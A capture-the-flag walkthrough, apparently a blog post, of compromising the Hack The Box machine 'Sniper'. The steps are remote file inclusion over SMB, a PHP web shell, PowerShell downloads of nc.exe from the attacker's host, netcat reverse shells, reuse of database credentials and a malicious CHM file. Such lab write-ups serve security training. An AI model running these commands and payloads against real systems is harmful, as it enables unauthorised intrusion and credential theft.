HTB: Sniper

Details

This machine is Sniper from Hack The Box

Recon

To start I ran an nmap scan against the box

root@kali:~# nmap -sV -p- -T4 10.10.10.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 17:16 GMT
Nmap scan report for 10.10.10.151
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.56 seconds

User

I started on the webserver http://10.10.10.151/

Screenshot 1

There is a link to a login page http://10.10.10.151/user/login.php

Screenshot 2

And a registration page http://10.10.10.151/user/registration.php

Screenshot 3

There is also a blog http://10.10.10.151/blog/index.php

Screenshot 4

The language of the blog was controlled by a query string param http://10.10.10.151/blog/?lang=blog-es.php

Screenshot 5

I was able to cause an infinite loading loop using http://10.10.10.151/blog/index.php?lang=index.php, so I tried RFI by making a file which contained

its an RFI

I tried to RFI this over HTTP but it didn't work, so I tried SMB instead

root@kali:~# python3 ./smbserver.py share /tmp
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I tried to include http://10.10.10.151/blog/index.php?lang=\\10.10.14.27\share\test.txt

Screenshot 6

But in my SMB

[*] Incoming connection (10.10.10.151,49682)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.151,49682)
[*] Remaining connections []

So it looked like it was almost working, so I tried the native SMB share tool instead by adding

[share]
path = /tmp/smb
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

To my samba config, which I then turned on the service

service smbd start

Went to http://10.10.10.151/blog/?lang=//10.10.14.27/share/test.txt

Screenshot 7

And in the source

Screenshot 8

So next up was a shell one, made a file called shell.txt containing

<?php system($_GET["cmd"]); ?>

And tested it with view-source:http://10.10.10.151/blog/?lang=//10.10.14.27/share/shell.txt&cmd=whoami

Screenshot 9

There is my RCE. Next up I wanted a reverse shell

root@kali:~# msfvenom -f exe -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=4444 > /tmp/shell.exe

Exposed it with a simplehttpserver, and ran the following commands in my webshell

mkdir C:\tmp
powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest http://10.10.14.27:8000/shell.exe -OutFile C:\tmp\shell.exe"

Then locally

root@kali:~# msfdb run
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.27
LHOST => 10.10.14.27
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.27:4444 

Then in the webshell

C:\tmp\shell.exe

And in the msf... nothing, must have been caught by AV. So round 2 I'll try nc

I expose it on simplehttpserver and run

powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest http://10.10.14.27:8000/nc.exe -OutFile C:\tmp\nc.exe"

Set a listener

root@kali:~# nc -nlvp 4444

In the webshell

C:\tmp\nc.exe 10.10.14.27 4444% -e powershell.exe

And in the listener

connect to [10.10.14.27] from (UNKNOWN) [10.10.10.151] 49735
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\blog>

There we go, lets see what's going on

PS C:\inetpub\wwwroot\blog> whoami
nt authority\iusr

I began to do some digging

PS C:\inetpub\wwwroot\user> dir
dir

    Directory: C:\inetpub\wwwroot\user

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/11/2019   5:52 AM                css
d-----        4/11/2019   5:23 AM                fonts
d-----        4/11/2019   5:23 AM                images
d-----        4/11/2019   5:23 AM                js
d-----        4/11/2019   5:23 AM                vendor
-a----        4/11/2019   5:15 PM            108 auth.php
-a----        4/11/2019  10:51 AM            337 db.php
-a----        4/11/2019   6:18 AM           4639 index.php
-a----        4/11/2019   6:10 AM           6463 login.php
-a----         4/8/2019  11:04 PM            148 logout.php
-a----        10/1/2019   8:42 AM           7192 registration.php
-a----        8/14/2019  10:35 PM           7004 registration_old123123123847.php
 PS C:\inetpub\wwwroot\user> type db.php
type db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

There are some db creds there, maybe I can use them to dump the db, made a new RFI file called dbdump.txt with the following

<?php

$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno()) {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
else {
  echo "Db connected";
  $query = "SELECT * FROM `users`";
  $result = mysqli_query($con,$query);
  var_dump($result);
  while($row = mysqli_fetch_assoc($result)) {
    var_dump($row);
  }
}

?>

Included it with view-source:http://10.10.10.151/blog/?lang=//10.10.14.27/share/dbdump.txt

Screenshot 10

The hash is

6e573c8b25e9168e0c61895d821a3d57

Which cracked to

$uperpassw0rd

But where to use it

PS C:\tmp> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Chris                    DefaultAccount
Guest                    WDAGUtilityAccount
The command completed with one or more errors.

So I'll go after Chris first, I'll try the user password cracked from the DB

PS C:\tmp> $user = 'Chris'
PS C:\tmp> $password = '$uperpassw0rd'
PS C:\tmp> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\tmp> $credential = New-Object System.Management.Automation.PSCredential $user, $securePassword

PS C:\tmp> Start-Process C:\tmp\nc.exe -ArgumentList "10.10.14.27 5555 -e powershell.exe" -Credential $credential
Start-Process C:\tmp\nc.exe -ArgumentList "10.10.14.27 5555 -e powershell.exe" -Credential $credential
Start-Process : This command cannot be run due to the error: The user name or password is incorrect.
At line:1 char:1
+ Start-Process C:\tmp\nc.exe -ArgumentList "10.10.14.27 5555 -e powers ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

Not that one, so try the DB password

PS C:\tmp> $user = 'Chris'
PS C:\tmp> $password = '36mEAhz/B8xQ~2VM'
PS C:\tmp> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\tmp> $credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
PS C:\tmp> Start-Process C:\tmp\nc.exe -ArgumentList "10.10.14.27 5555 -e powershell.exe" -Credential $credential

No error, but no shell. So I verified the password on SMB

root@kali:~# smbmap -H 10.10.10.151 -u Chris -p '36mEAhz/B8xQ~2VM'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.151...
[+] IP: 10.10.10.151:445        Name: 10.10.10.151
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-394-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-1e4-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-41c-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    atsvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-57c-0
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    spoolss
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-a70-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    trkwks
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    W32TIME_ALT
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-280-0
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    srvsvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-26c-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    iisipm35db4db3-8a6c-4aef-a9b8-8b92984e2582
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    ROUTER
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    iislogpipeae0eb4e4-5fa0-4e80-b622-3a9c91de6ae9
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PSHost.132268903358727113.1552.DefaultAppDomain.powershell
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    IISFCGI-1492a1d3-1f99-4c4c-b0b4-364fc4c2ad52
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PSHost.132269006202263334.5244.DefaultAppDomain.powershell
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    IISFCGI-7eea1019-f167-4058-a725-a433a0a6561f
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PSHost.132269016034224006.4980.DefaultAppDomain.powershell
        IPC$                                                    READ ONLY       Remote IPC

So the password is right, I'll try with Invoke-Command instead of Start-Process

PS C:\tmp> $user = 'Sniper\Chris'
PS C:\tmp> $password = '36mEAhz/B8xQ~2VM'
PS C:\tmp> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\tmp> $credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
PS C:\tmp> Invoke-Command -Computer Sniper -ScriptBlock { whoami } -Credential $credential
sniper\chris

So that worked, I set a new listener and used it to rerun nc but as Chris

root@kali:~# nc -nlvp 5555

PS C:\tmp> Invoke-Command -Computer Sniper -ScriptBlock { C:\tmp\nc.exe 10.10.14.27 5555 -e powershell.exe } -Credential $credential

In the listener

connect to [10.10.14.27] from (UNKNOWN) [10.10.10.151] 49784
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents>

There is a new shell

PS C:\Users\Chris\Documents> cd ..
PS C:\Users\Chris> cd Desktop

PS C:\Users\Chris\Desktop> dir

    Directory: C:\Users\Chris\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:15 AM             32 user.txt

PS C:\Users\Chris\Desktop> type user.txt
[REDACTED]

System

I began to dig and found an interesting directory

PS C:\Docs> dir

    Directory: C:\Docs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf

PS C:\Docs> type note.txt
Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

I also found a file in my downloads

# PS C:\Users\Chris\Downloads> dir

    Directory: C:\Users\Chris\Downloads

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:36 AM          10462 instructions.chm       

So they want docs, and have a cmh file, maybe a malicious chm file is the solution, I downloaded a script for doing this https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1 onto a windows VM and setup a payload

Out-CHM -Payload "cmd /r 'C:\tmp\nc.exe 10.10.14.27 9999 -e powershell.exe'" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

And used my simplehttpserver + Invoke-WebRequest to move it onto the target, I then dropped it in the docs folder

PS C:\tmp> cp doc.chm C:\Docs

Annoyingly I had some issues getting a shell one to work, so I used one to steal the flag instead

Out-CHM -Payload "cp C:\Users\Administrator\Desktop\root.txt C:\tmp\root.txt" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
PS C:\tmp> type root.txt
[REDACTED]

Now I'll probably come back at some point and get the shell one working, but I was tired and wanted the flag!;

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.